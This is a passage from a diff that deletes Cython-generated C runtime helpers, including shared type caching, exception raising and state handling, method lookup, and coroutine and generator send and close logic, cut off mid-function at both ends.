object_name+1 : type->tp_name; - cached_type = (PyTypeObject*) PyObject_GetAttrString(abi_module, object_name); - if (cached_type) { - if (__Pyx_VerifyCachedType( - (PyObject *)cached_type, - object_name, - cached_type->tp_basicsize, - type->tp_basicsize) < 0) { - goto bad; - } - goto done; - } - if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; - PyErr_Clear(); - if (PyType_Ready(type) < 0) goto bad; - if (PyObject_SetAttrString(abi_module, object_name, (PyObject *)type) < 0) - goto bad; - Py_INCREF(type); - cached_type = type; -done: - Py_DECREF(abi_module); - return cached_type; -bad: - Py_XDECREF(cached_type); - cached_type = NULL; - goto done; -} -#else -static PyTypeObject *__Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases) { - PyObject *abi_module, *cached_type = NULL; - const char* object_name = strrchr(spec->name, '.'); - object_name = object_name ? object_name+1 : spec->name; - abi_module = __Pyx_FetchSharedCythonABIModule(); - if (!abi_module) return NULL; - cached_type = PyObject_GetAttrString(abi_module, object_name); - if (cached_type) { - Py_ssize_t basicsize; -#if CYTHON_COMPILING_IN_LIMITED_API - PyObject *py_basicsize; - py_basicsize = PyObject_GetAttrString(cached_type, "__basicsize__"); - if (unlikely(!py_basicsize)) goto bad; - basicsize = PyLong_AsSsize_t(py_basicsize); - Py_DECREF(py_basicsize); - py_basicsize = 0; - if (unlikely(basicsize == (Py_ssize_t)-1) && PyErr_Occurred()) goto bad; -#else - basicsize = likely(PyType_Check(cached_type)) ? 
((PyTypeObject*) cached_type)->tp_basicsize : -1; -#endif - if (__Pyx_VerifyCachedType( - cached_type, - object_name, - basicsize, - spec->basicsize) < 0) { - goto bad; - } - goto done; - } - if (!PyErr_ExceptionMatches(PyExc_AttributeError)) goto bad; - PyErr_Clear(); - CYTHON_UNUSED_VAR(module); - cached_type = __Pyx_PyType_FromModuleAndSpec(abi_module, spec, bases); - if (unlikely(!cached_type)) goto bad; - if (unlikely(__Pyx_fix_up_extension_type_from_spec(spec, (PyTypeObject *) cached_type) < 0)) goto bad; - if (PyObject_SetAttrString(abi_module, object_name, cached_type) < 0) goto bad; -done: - Py_DECREF(abi_module); - assert(cached_type == NULL || PyType_Check(cached_type)); - return (PyTypeObject *) cached_type; -bad: - Py_XDECREF(cached_type); - cached_type = NULL; - goto done; -} -#endif - -/* RaiseException */ -#if PY_MAJOR_VERSION < 3 -static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { - __Pyx_PyThreadState_declare - CYTHON_UNUSED_VAR(cause); - Py_XINCREF(type); - if (!value || value == Py_None) - value = NULL; - else - Py_INCREF(value); - if (!tb || tb == Py_None) - tb = NULL; - else { - Py_INCREF(tb); - if (!PyTraceBack_Check(tb)) { - PyErr_SetString(PyExc_TypeError, - "raise: arg 3 must be a traceback or None"); - goto raise_error; - } - } - if (PyType_Check(type)) { -#if CYTHON_COMPILING_IN_PYPY - if (!value) { - Py_INCREF(Py_None); - value = Py_None; - } -#endif - PyErr_NormalizeException(&type, &value, &tb); - } else { - if (value) { - PyErr_SetString(PyExc_TypeError, - "instance exception may not have a separate value"); - goto raise_error; - } - value = type; - type = (PyObject*) Py_TYPE(type); - Py_INCREF(type); - if (!PyType_IsSubtype((PyTypeObject *)type, (PyTypeObject *)PyExc_BaseException)) { - PyErr_SetString(PyExc_TypeError, - "raise: exception class must be a subclass of BaseException"); - goto raise_error; - } - } - __Pyx_PyThreadState_assign - __Pyx_ErrRestore(type, value, tb); - return; 
-raise_error: - Py_XDECREF(value); - Py_XDECREF(type); - Py_XDECREF(tb); - return; -} -#else -static void __Pyx_Raise(PyObject *type, PyObject *value, PyObject *tb, PyObject *cause) { - PyObject* owned_instance = NULL; - if (tb == Py_None) { - tb = 0; - } else if (tb && !PyTraceBack_Check(tb)) { - PyErr_SetString(PyExc_TypeError, - "raise: arg 3 must be a traceback or None"); - goto bad; - } - if (value == Py_None) - value = 0; - if (PyExceptionInstance_Check(type)) { - if (value) { - PyErr_SetString(PyExc_TypeError, - "instance exception may not have a separate value"); - goto bad; - } - value = type; - type = (PyObject*) Py_TYPE(value); - } else if (PyExceptionClass_Check(type)) { - PyObject *instance_class = NULL; - if (value && PyExceptionInstance_Check(value)) { - instance_class = (PyObject*) Py_TYPE(value); - if (instance_class != type) { - int is_subclass = PyObject_IsSubclass(instance_class, type); - if (!is_subclass) { - instance_class = NULL; - } else if (unlikely(is_subclass == -1)) { - goto bad; - } else { - type = instance_class; - } - } - } - if (!instance_class) { - PyObject *args; - if (!value) - args = PyTuple_New(0); - else if (PyTuple_Check(value)) { - Py_INCREF(value); - args = value; - } else - args = PyTuple_Pack(1, value); - if (!args) - goto bad; - owned_instance = PyObject_Call(type, args, NULL); - Py_DECREF(args); - if (!owned_instance) - goto bad; - value = owned_instance; - if (!PyExceptionInstance_Check(value)) { - PyErr_Format(PyExc_TypeError, - "calling %R should have returned an instance of " - "BaseException, not %R", - type, Py_TYPE(value)); - goto bad; - } - } - } else { - PyErr_SetString(PyExc_TypeError, - "raise: exception class must be a subclass of BaseException"); - goto bad; - } - if (cause) { - PyObject *fixed_cause; - if (cause == Py_None) { - fixed_cause = NULL; - } else if (PyExceptionClass_Check(cause)) { - fixed_cause = PyObject_CallObject(cause, NULL); - if (fixed_cause == NULL) - goto bad; - } else if 
(PyExceptionInstance_Check(cause)) { - fixed_cause = cause; - Py_INCREF(fixed_cause); - } else { - PyErr_SetString(PyExc_TypeError, - "exception causes must derive from " - "BaseException"); - goto bad; - } - PyException_SetCause(value, fixed_cause); - } - PyErr_SetObject(type, value); - if (tb) { - #if PY_VERSION_HEX >= 0x030C00A6 - PyException_SetTraceback(value, tb); - #elif CYTHON_FAST_THREAD_STATE - PyThreadState *tstate = __Pyx_PyThreadState_Current; - PyObject* tmp_tb = tstate->curexc_traceback; - if (tb != tmp_tb) { - Py_INCREF(tb); - tstate->curexc_traceback = tb; - Py_XDECREF(tmp_tb); - } -#else - PyObject *tmp_type, *tmp_value, *tmp_tb; - PyErr_Fetch(&tmp_type, &tmp_value, &tmp_tb); - Py_INCREF(tb); - PyErr_Restore(tmp_type, tmp_value, tb); - Py_XDECREF(tmp_tb); -#endif - } -bad: - Py_XDECREF(owned_instance); - return; -} -#endif - -/* GetTopmostException */ -#if CYTHON_USE_EXC_INFO_STACK && CYTHON_FAST_THREAD_STATE -static _PyErr_StackItem * -__Pyx_PyErr_GetTopmostException(PyThreadState *tstate) -{ - _PyErr_StackItem *exc_info = tstate->exc_info; - while ((exc_info->exc_value == NULL || exc_info->exc_value == Py_None) && - exc_info->previous_item != NULL) - { - exc_info = exc_info->previous_item; - } - return exc_info; -} -#endif - -/* SaveResetException */ -#if CYTHON_FAST_THREAD_STATE -static CYTHON_INLINE void __Pyx__ExceptionSave(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { - #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 - _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); - PyObject *exc_value = exc_info->exc_value; - if (exc_value == NULL || exc_value == Py_None) { - *value = NULL; - *type = NULL; - *tb = NULL; - } else { - *value = exc_value; - Py_INCREF(*value); - *type = (PyObject*) Py_TYPE(exc_value); - Py_INCREF(*type); - *tb = PyException_GetTraceback(exc_value); - } - #elif CYTHON_USE_EXC_INFO_STACK - _PyErr_StackItem *exc_info = __Pyx_PyErr_GetTopmostException(tstate); - 
*type = exc_info->exc_type; - *value = exc_info->exc_value; - *tb = exc_info->exc_traceback; - Py_XINCREF(*type); - Py_XINCREF(*value); - Py_XINCREF(*tb); - #else - *type = tstate->exc_type; - *value = tstate->exc_value; - *tb = tstate->exc_traceback; - Py_XINCREF(*type); - Py_XINCREF(*value); - Py_XINCREF(*tb); - #endif -} -static CYTHON_INLINE void __Pyx__ExceptionReset(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { - #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 - _PyErr_StackItem *exc_info = tstate->exc_info; - PyObject *tmp_value = exc_info->exc_value; - exc_info->exc_value = value; - Py_XDECREF(tmp_value); - Py_XDECREF(type); - Py_XDECREF(tb); - #else - PyObject *tmp_type, *tmp_value, *tmp_tb; - #if CYTHON_USE_EXC_INFO_STACK - _PyErr_StackItem *exc_info = tstate->exc_info; - tmp_type = exc_info->exc_type; - tmp_value = exc_info->exc_value; - tmp_tb = exc_info->exc_traceback; - exc_info->exc_type = type; - exc_info->exc_value = value; - exc_info->exc_traceback = tb; - #else - tmp_type = tstate->exc_type; - tmp_value = tstate->exc_value; - tmp_tb = tstate->exc_traceback; - tstate->exc_type = type; - tstate->exc_value = value; - tstate->exc_traceback = tb; - #endif - Py_XDECREF(tmp_type); - Py_XDECREF(tmp_value); - Py_XDECREF(tmp_tb); - #endif -} -#endif - -/* SwapException */ -#if CYTHON_FAST_THREAD_STATE -static CYTHON_INLINE void __Pyx__ExceptionSwap(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { - PyObject *tmp_type, *tmp_value, *tmp_tb; - #if CYTHON_USE_EXC_INFO_STACK && PY_VERSION_HEX >= 0x030B00a4 - _PyErr_StackItem *exc_info = tstate->exc_info; - tmp_value = exc_info->exc_value; - exc_info->exc_value = *value; - if (tmp_value == NULL || tmp_value == Py_None) { - Py_XDECREF(tmp_value); - tmp_value = NULL; - tmp_type = NULL; - tmp_tb = NULL; - } else { - tmp_type = (PyObject*) Py_TYPE(tmp_value); - Py_INCREF(tmp_type); - #if CYTHON_COMPILING_IN_CPYTHON - tmp_tb = ((PyBaseExceptionObject*) 
tmp_value)->traceback; - Py_XINCREF(tmp_tb); - #else - tmp_tb = PyException_GetTraceback(tmp_value); - #endif - } - #elif CYTHON_USE_EXC_INFO_STACK - _PyErr_StackItem *exc_info = tstate->exc_info; - tmp_type = exc_info->exc_type; - tmp_value = exc_info->exc_value; - tmp_tb = exc_info->exc_traceback; - exc_info->exc_type = *type; - exc_info->exc_value = *value; - exc_info->exc_traceback = *tb; - #else - tmp_type = tstate->exc_type; - tmp_value = tstate->exc_value; - tmp_tb = tstate->exc_traceback; - tstate->exc_type = *type; - tstate->exc_value = *value; - tstate->exc_traceback = *tb; - #endif - *type = tmp_type; - *value = tmp_value; - *tb = tmp_tb; -} -#else -static CYTHON_INLINE void __Pyx_ExceptionSwap(PyObject **type, PyObject **value, PyObject **tb) { - PyObject *tmp_type, *tmp_value, *tmp_tb; - PyErr_GetExcInfo(&tmp_type, &tmp_value, &tmp_tb); - PyErr_SetExcInfo(*type, *value, *tb); - *type = tmp_type; - *value = tmp_value; - *tb = tmp_tb; -} -#endif - -/* PyObjectCall2Args */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_Call2Args(PyObject* function, PyObject* arg1, PyObject* arg2) { - PyObject *args[3] = {NULL, arg1, arg2}; - return __Pyx_PyObject_FastCall(function, args+1, 2 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); -} - -/* PyObjectGetMethod */ -static int __Pyx_PyObject_GetMethod(PyObject *obj, PyObject *name, PyObject **method) { - PyObject *attr; -#if CYTHON_UNPACK_METHODS && CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_PYTYPE_LOOKUP - __Pyx_TypeName type_name; - PyTypeObject *tp = Py_TYPE(obj); - PyObject *descr; - descrgetfunc f = NULL; - PyObject **dictptr, *dict; - int meth_found = 0; - assert (*method == NULL); - if (unlikely(tp->tp_getattro != PyObject_GenericGetAttr)) { - attr = __Pyx_PyObject_GetAttrStr(obj, name); - goto try_unpack; - } - if (unlikely(tp->tp_dict == NULL) && unlikely(PyType_Ready(tp) < 0)) { - return 0; - } - descr = _PyType_Lookup(tp, name); - if (likely(descr != NULL)) { - Py_INCREF(descr); -#if 
defined(Py_TPFLAGS_METHOD_DESCRIPTOR) && Py_TPFLAGS_METHOD_DESCRIPTOR - if (__Pyx_PyType_HasFeature(Py_TYPE(descr), Py_TPFLAGS_METHOD_DESCRIPTOR)) -#elif PY_MAJOR_VERSION >= 3 - #ifdef __Pyx_CyFunction_USED - if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type) || __Pyx_CyFunction_Check(descr))) - #else - if (likely(PyFunction_Check(descr) || __Pyx_IS_TYPE(descr, &PyMethodDescr_Type))) - #endif -#else - #ifdef __Pyx_CyFunction_USED - if (likely(PyFunction_Check(descr) || __Pyx_CyFunction_Check(descr))) - #else - if (likely(PyFunction_Check(descr))) - #endif -#endif - { - meth_found = 1; - } else { - f = Py_TYPE(descr)->tp_descr_get; - if (f != NULL && PyDescr_IsData(descr)) { - attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); - Py_DECREF(descr); - goto try_unpack; - } - } - } - dictptr = _PyObject_GetDictPtr(obj); - if (dictptr != NULL && (dict = *dictptr) != NULL) { - Py_INCREF(dict); - attr = __Pyx_PyDict_GetItemStr(dict, name); - if (attr != NULL) { - Py_INCREF(attr); - Py_DECREF(dict); - Py_XDECREF(descr); - goto try_unpack; - } - Py_DECREF(dict); - } - if (meth_found) { - *method = descr; - return 1; - } - if (f != NULL) { - attr = f(descr, obj, (PyObject *)Py_TYPE(obj)); - Py_DECREF(descr); - goto try_unpack; - } - if (likely(descr != NULL)) { - *method = descr; - return 0; - } - type_name = __Pyx_PyType_GetName(tp); - PyErr_Format(PyExc_AttributeError, -#if PY_MAJOR_VERSION >= 3 - "'" __Pyx_FMT_TYPENAME "' object has no attribute '%U'", - type_name, name); -#else - "'" __Pyx_FMT_TYPENAME "' object has no attribute '%.400s'", - type_name, PyString_AS_STRING(name)); -#endif - __Pyx_DECREF_TypeName(type_name); - return 0; -#else - attr = __Pyx_PyObject_GetAttrStr(obj, name); - goto try_unpack; -#endif -try_unpack: -#if CYTHON_UNPACK_METHODS - if (likely(attr) && PyMethod_Check(attr) && likely(PyMethod_GET_SELF(attr) == obj)) { - PyObject *function = PyMethod_GET_FUNCTION(attr); - Py_INCREF(function); - Py_DECREF(attr); - *method = 
function; - return 1; - } -#endif - *method = attr; - return 0; -} - -/* PyObjectCallMethod1 */ -static PyObject* __Pyx__PyObject_CallMethod1(PyObject* method, PyObject* arg) { - PyObject *result = __Pyx_PyObject_CallOneArg(method, arg); - Py_DECREF(method); - return result; -} -static PyObject* __Pyx_PyObject_CallMethod1(PyObject* obj, PyObject* method_name, PyObject* arg) { - PyObject *method = NULL, *result; - int is_method = __Pyx_PyObject_GetMethod(obj, method_name, &method); - if (likely(is_method)) { - result = __Pyx_PyObject_Call2Args(method, obj, arg); - Py_DECREF(method); - return result; - } - if (unlikely(!method)) return NULL; - return __Pyx__PyObject_CallMethod1(method, arg); -} - -/* PyObjectCallNoArg */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallNoArg(PyObject *func) { - PyObject *arg[2] = {NULL, NULL}; - return __Pyx_PyObject_FastCall(func, arg + 1, 0 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); -} - -/* CoroutineBase */ -#include <frameobject.h> -#if PY_VERSION_HEX >= 0x030b00a6 - #ifndef Py_BUILD_CORE - #define Py_BUILD_CORE 1 - #endif - #include "internal/pycore_frame.h" -#endif -#define __Pyx_Coroutine_Undelegate(gen) Py_CLEAR((gen)->yieldfrom) -static int __Pyx_PyGen__FetchStopIterationValue(PyThreadState *__pyx_tstate, PyObject **pvalue) { - PyObject *et, *ev, *tb; - PyObject *value = NULL; - CYTHON_UNUSED_VAR(__pyx_tstate); - __Pyx_ErrFetch(&et, &ev, &tb); - if (!et) { - Py_XDECREF(tb); - Py_XDECREF(ev); - Py_INCREF(Py_None); - *pvalue = Py_None; - return 0; - } - if (likely(et == PyExc_StopIteration)) { - if (!ev) { - Py_INCREF(Py_None); - value = Py_None; - } -#if PY_VERSION_HEX >= 0x030300A0 - else if (likely(__Pyx_IS_TYPE(ev, (PyTypeObject*)PyExc_StopIteration))) { - value = ((PyStopIterationObject *)ev)->value; - Py_INCREF(value); - Py_DECREF(ev); - } -#endif - else if (unlikely(PyTuple_Check(ev))) { - if (PyTuple_GET_SIZE(ev) >= 1) { -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - value = PyTuple_GET_ITEM(ev, 0); - 
Py_INCREF(value); -#else - value = PySequence_ITEM(ev, 0); -#endif - } else { - Py_INCREF(Py_None); - value = Py_None; - } - Py_DECREF(ev); - } - else if (!__Pyx_TypeCheck(ev, (PyTypeObject*)PyExc_StopIteration)) { - value = ev; - } - if (likely(value)) { - Py_XDECREF(tb); - Py_DECREF(et); - *pvalue = value; - return 0; - } - } else if (!__Pyx_PyErr_GivenExceptionMatches(et, PyExc_StopIteration)) { - __Pyx_ErrRestore(et, ev, tb); - return -1; - } - PyErr_NormalizeException(&et, &ev, &tb); - if (unlikely(!PyObject_TypeCheck(ev, (PyTypeObject*)PyExc_StopIteration))) { - __Pyx_ErrRestore(et, ev, tb); - return -1; - } - Py_XDECREF(tb); - Py_DECREF(et); -#if PY_VERSION_HEX >= 0x030300A0 - value = ((PyStopIterationObject *)ev)->value; - Py_INCREF(value); - Py_DECREF(ev); -#else - { - PyObject* args = __Pyx_PyObject_GetAttrStr(ev, __pyx_n_s_args); - Py_DECREF(ev); - if (likely(args)) { - value = PySequence_GetItem(args, 0); - Py_DECREF(args); - } - if (unlikely(!value)) { - __Pyx_ErrRestore(NULL, NULL, NULL); - Py_INCREF(Py_None); - value = Py_None; - } - } -#endif - *pvalue = value; - return 0; -} -static CYTHON_INLINE -void __Pyx_Coroutine_ExceptionClear(__Pyx_ExcInfoStruct *exc_state) { -#if PY_VERSION_HEX >= 0x030B00a4 - Py_CLEAR(exc_state->exc_value); -#else - PyObject *t, *v, *tb; - t = exc_state->exc_type; - v = exc_state->exc_value; - tb = exc_state->exc_traceback; - exc_state->exc_type = NULL; - exc_state->exc_value = NULL; - exc_state->exc_traceback = NULL; - Py_XDECREF(t); - Py_XDECREF(v); - Py_XDECREF(tb); -#endif -} -#define __Pyx_Coroutine_AlreadyRunningError(gen) (__Pyx__Coroutine_AlreadyRunningError(gen), (PyObject*)NULL) -static void __Pyx__Coroutine_AlreadyRunningError(__pyx_CoroutineObject *gen) { - const char *msg; - CYTHON_MAYBE_UNUSED_VAR(gen); - if ((0)) { - #ifdef __Pyx_Coroutine_USED - } else if (__Pyx_Coroutine_Check((PyObject*)gen)) { - msg = "coroutine already executing"; - #endif - #ifdef __Pyx_AsyncGen_USED - } else if 
(__Pyx_AsyncGen_CheckExact((PyObject*)gen)) { - msg = "async generator already executing"; - #endif - } else { - msg = "generator already executing"; - } - PyErr_SetString(PyExc_ValueError, msg); -} -#define __Pyx_Coroutine_NotStartedError(gen) (__Pyx__Coroutine_NotStartedError(gen), (PyObject*)NULL) -static void __Pyx__Coroutine_NotStartedError(PyObject *gen) { - const char *msg; - CYTHON_MAYBE_UNUSED_VAR(gen); - if ((0)) { - #ifdef __Pyx_Coroutine_USED - } else if (__Pyx_Coroutine_Check(gen)) { - msg = "can't send non-None value to a just-started coroutine"; - #endif - #ifdef __Pyx_AsyncGen_USED - } else if (__Pyx_AsyncGen_CheckExact(gen)) { - msg = "can't send non-None value to a just-started async generator"; - #endif - } else { - msg = "can't send non-None value to a just-started generator"; - } - PyErr_SetString(PyExc_TypeError, msg); -} -#define __Pyx_Coroutine_AlreadyTerminatedError(gen, value, closing) (__Pyx__Coroutine_AlreadyTerminatedError(gen, value, closing), (PyObject*)NULL) -static void __Pyx__Coroutine_AlreadyTerminatedError(PyObject *gen, PyObject *value, int closing) { - CYTHON_MAYBE_UNUSED_VAR(gen); - CYTHON_MAYBE_UNUSED_VAR(closing); - #ifdef __Pyx_Coroutine_USED - if (!closing && __Pyx_Coroutine_Check(gen)) { - PyErr_SetString(PyExc_RuntimeError, "cannot reuse already awaited coroutine"); - } else - #endif - if (value) { - #ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(gen)) - PyErr_SetNone(__Pyx_PyExc_StopAsyncIteration); - else - #endif - PyErr_SetNone(PyExc_StopIteration); - } -} -static -PyObject *__Pyx_Coroutine_SendEx(__pyx_CoroutineObject *self, PyObject *value, int closing) { - __Pyx_PyThreadState_declare - PyThreadState *tstate; - __Pyx_ExcInfoStruct *exc_state; - PyObject *retval; - assert(!self->is_running); - if (unlikely(self->resume_label == 0)) { - if (unlikely(value && value != Py_None)) { - return __Pyx_Coroutine_NotStartedError((PyObject*)self); - } - } - if (unlikely(self->resume_label == -1)) { - return 
__Pyx_Coroutine_AlreadyTerminatedError((PyObject*)self, value, closing); - } -#if CYTHON_FAST_THREAD_STATE - __Pyx_PyThreadState_assign - tstate = __pyx_tstate; -#else - tstate = __Pyx_PyThreadState_Current; -#endif - exc_state = &self->gi_exc_state; - if (exc_state->exc_value) { - #if CYTHON_COMPILING_IN_PYPY - #else - PyObject *exc_tb; - #if PY_VERSION_HEX >= 0x030B00a4 && !CYTHON_COMPILING_IN_CPYTHON - exc_tb = PyException_GetTraceback(exc_state->exc_value); - #elif PY_VERSION_HEX >= 0x030B00a4 - exc_tb = ((PyBaseExceptionObject*) exc_state->exc_value)->traceback; - #else - exc_tb = exc_state->exc_traceback; - #endif - if (exc_tb) { - PyTracebackObject *tb = (PyTracebackObject *) exc_tb; - PyFrameObject *f = tb->tb_frame; - assert(f->f_back == NULL); - #if PY_VERSION_HEX >= 0x030B00A1 - f->f_back = PyThreadState_GetFrame(tstate); - #else - Py_XINCREF(tstate->frame); - f->f_back = tstate->frame; - #endif - #if PY_VERSION_HEX >= 0x030B00a4 && !CYTHON_COMPILING_IN_CPYTHON - Py_DECREF(exc_tb); - #endif - } - #endif - } -#if CYTHON_USE_EXC_INFO_STACK - exc_state->previous_item = tstate->exc_info; - tstate->exc_info = exc_state; -#else - if (exc_state->exc_type) { - __Pyx_ExceptionSwap(&exc_state->exc_type, &exc_state->exc_value, &exc_state->exc_traceback); - } else { - __Pyx_Coroutine_ExceptionClear(exc_state); - __Pyx_ExceptionSave(&exc_state->exc_type, &exc_state->exc_value, &exc_state->exc_traceback); - } -#endif - self->is_running = 1; - retval = self->body(self, tstate, value); - self->is_running = 0; -#if CYTHON_USE_EXC_INFO_STACK - exc_state = &self->gi_exc_state; - tstate->exc_info = exc_state->previous_item; - exc_state->previous_item = NULL; - __Pyx_Coroutine_ResetFrameBackpointer(exc_state); -#endif - return retval; -} -static CYTHON_INLINE void __Pyx_Coroutine_ResetFrameBackpointer(__Pyx_ExcInfoStruct *exc_state) { -#if CYTHON_COMPILING_IN_PYPY - CYTHON_UNUSED_VAR(exc_state); -#else - PyObject *exc_tb; - #if PY_VERSION_HEX >= 0x030B00a4 - if 
(!exc_state->exc_value) return; - exc_tb = PyException_GetTraceback(exc_state->exc_value); - #else - exc_tb = exc_state->exc_traceback; - #endif - if (likely(exc_tb)) { - PyTracebackObject *tb = (PyTracebackObject *) exc_tb; - PyFrameObject *f = tb->tb_frame; - Py_CLEAR(f->f_back); - #if PY_VERSION_HEX >= 0x030B00a4 - Py_DECREF(exc_tb); - #endif - } -#endif -} -static CYTHON_INLINE -PyObject *__Pyx_Coroutine_MethodReturn(PyObject* gen, PyObject *retval) { - CYTHON_MAYBE_UNUSED_VAR(gen); - if (unlikely(!retval)) { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - if (!__Pyx_PyErr_Occurred()) { - PyObject *exc = PyExc_StopIteration; - #ifdef __Pyx_AsyncGen_USED - if (__Pyx_AsyncGen_CheckExact(gen)) - exc = __Pyx_PyExc_StopAsyncIteration; - #endif - __Pyx_PyErr_SetNone(exc); - } - } - return retval; -} -#if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03030000 && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) -static CYTHON_INLINE -PyObject *__Pyx_PyGen_Send(PyGenObject *gen, PyObject *arg) { -#if PY_VERSION_HEX <= 0x030A00A1 - return _PyGen_Send(gen, arg); -#else - PyObject *result; - if (PyIter_Send((PyObject*)gen, arg ? 
arg : Py_None, &result) == PYGEN_RETURN) { - if (PyAsyncGen_CheckExact(gen)) { - assert(result == Py_None); - PyErr_SetNone(PyExc_StopAsyncIteration); - } - else if (result == Py_None) { - PyErr_SetNone(PyExc_StopIteration); - } - else { - _PyGen_SetStopIterationValue(result); - } - Py_CLEAR(result); - } - return result; -#endif -} -#endif -static CYTHON_INLINE -PyObject *__Pyx_Coroutine_FinishDelegation(__pyx_CoroutineObject *gen) { - PyObject *ret; - PyObject *val = NULL; - __Pyx_Coroutine_Undelegate(gen); - __Pyx_PyGen__FetchStopIterationValue(__Pyx_PyThreadState_Current, &val); - ret = __Pyx_Coroutine_SendEx(gen, val, 0); - Py_XDECREF(val); - return ret; -} -static PyObject *__Pyx_Coroutine_Send(PyObject *self, PyObject *value) { - PyObject *retval; - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject*) self; - PyObject *yf = gen->yieldfrom; - if (unlikely(gen->is_running)) - return __Pyx_Coroutine_AlreadyRunningError(gen); - if (yf) { - PyObject *ret; - gen->is_running = 1; - #ifdef __Pyx_Generator_USED - if (__Pyx_Generator_CheckExact(yf)) { - ret = __Pyx_Coroutine_Send(yf, value); - } else - #endif - #ifdef __Pyx_Coroutine_USED - if (__Pyx_Coroutine_Check(yf)) { - ret = __Pyx_Coroutine_Send(yf, value); - } else - #endif - #ifdef __Pyx_AsyncGen_USED - if (__pyx_PyAsyncGenASend_CheckExact(yf)) { - ret = __Pyx_async_gen_asend_send(yf, value); - } else - #endif - #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03030000 && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) - if (PyGen_CheckExact(yf)) { - ret = __Pyx_PyGen_Send((PyGenObject*)yf, value == Py_None ? NULL : value); - } else - #endif - #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03050000 && defined(PyCoro_CheckExact) && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) - if (PyCoro_CheckExact(yf)) { - ret = __Pyx_PyGen_Send((PyGenObject*)yf, value == Py_None ? 
NULL : value); - } else - #endif - { - if (value == Py_None) - ret = __Pyx_PyObject_GetIterNextFunc(yf)(yf); - else - ret = __Pyx_PyObject_CallMethod1(yf, __pyx_n_s_send, value); - } - gen->is_running = 0; - if (likely(ret)) { - return ret; - } - retval = __Pyx_Coroutine_FinishDelegation(gen); - } else { - retval = __Pyx_Coroutine_SendEx(gen, value, 0); - } - return __Pyx_Coroutine_MethodReturn(self, retval); -} -static int __Pyx_Coroutine_CloseIter(__pyx_CoroutineObject *gen, PyObject *yf) { - PyObject *retval = NULL; - int err = 0; - #ifdef __Pyx_Generator_USED - if (__Pyx_Generator_CheckExact(yf)) { - retval = __Pyx_Coroutine_Close(yf); - if (!retval) - return -1; - } else - #endif - #ifdef __Pyx_Coroutine_USED - if (__Pyx_Coroutine_Check(yf)) { - retval = __Pyx_Coroutine_Close(yf); - if (!retval) - return -1; - } else - if (__Pyx_CoroutineAwait_CheckExact(yf)) { - retval = __Pyx_CoroutineAwait_Close((__pyx_CoroutineAwaitObject*)yf, NULL); - if (!retval) - return -1; - } else - #endif - #ifdef __Pyx_AsyncGen_USED - if (__pyx_PyAsyncGenASend_CheckExact(yf)) { - retval = __Pyx_async_gen_asend_close(yf, NULL); - } else - if (__pyx_PyAsyncGenAThrow_CheckExact(yf)) { - retval = __Pyx_async_gen_athrow_close(yf, NULL); - } else - #endif - { - PyObject *meth; - gen->is_running = 1; - meth = __Pyx_PyObject_GetAttrStrNoError(yf, __pyx_n_s_close); - if (unlikely(!meth)) { - if (unlikely(PyErr_Occurred())) { - PyErr_WriteUnraisable(yf); - } - } else { - retval = __Pyx_PyObject_CallNoArg(meth); - Py_DECREF(meth); - if (unlikely(!retval)) - err = -1; - } - gen->is_running = 0; - } - Py_XDECREF(retval); - return err; -} -static PyObject *__Pyx_Generator_Next(PyObject *self) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject*) self; - PyObject *yf = gen->yieldfrom; - if (unlikely(gen->is_running)) - return __Pyx_Coroutine_AlreadyRunningError(gen); - if (yf) { - PyObject *ret; - gen->is_running = 1; - #ifdef __Pyx_Generator_USED - if (__Pyx_Generator_CheckExact(yf)) { - ret 
= __Pyx_Generator_Next(yf); - } else - #endif - #if CYTHON_COMPILING_IN_CPYTHON && PY_VERSION_HEX >= 0x03030000 && (defined(__linux__) || PY_VERSION_HEX >= 0x030600B3) - if (PyGen_CheckExact(yf)) { - ret = __Pyx_PyGen_Send((PyGenObject*)yf, NULL); - } else - #endif - #ifdef __Pyx_Coroutine_USED - if (__Pyx_Coroutine_Check(yf)) { - ret = __Pyx_Coroutine_Send(yf, Py_None); - } else - #endif - ret = __Pyx_PyObject_GetIterNextFunc(yf)(yf); - gen->is_running = 0; - if (likely(ret)) { - return ret; - } - return __Pyx_Coroutine_FinishDelegation(gen); - } - return __Pyx_Coroutine_SendEx(gen, Py_None, 0); -} -static PyObject *__Pyx_Coroutine_Close_Method(PyObject *self, PyObject *arg) { - CYTHON_UNUSED_VAR(arg); - return __Pyx_Coroutine_Close(self); -} -static PyObject *__Pyx_Coroutine_Close(PyObject *self) { - __pyx_CoroutineObject *gen = (__pyx_CoroutineObject *) self; - PyObject *retval, *raised_exception; - PyObject *yf = gen->yieldfrom; - int err = 0; - if (unlikely(gen->is_running)) - return __Pyx_Coroutine_AlreadyRunningError(gen); - if (yf) { - Py_INCREF(yf); - err = __Pyx_Coroutine_CloseIter(gen, yf); - __Pyx_Coroutine_Undelegate(gen); - Py_DECREF(yf); - } - if (err == 0) - 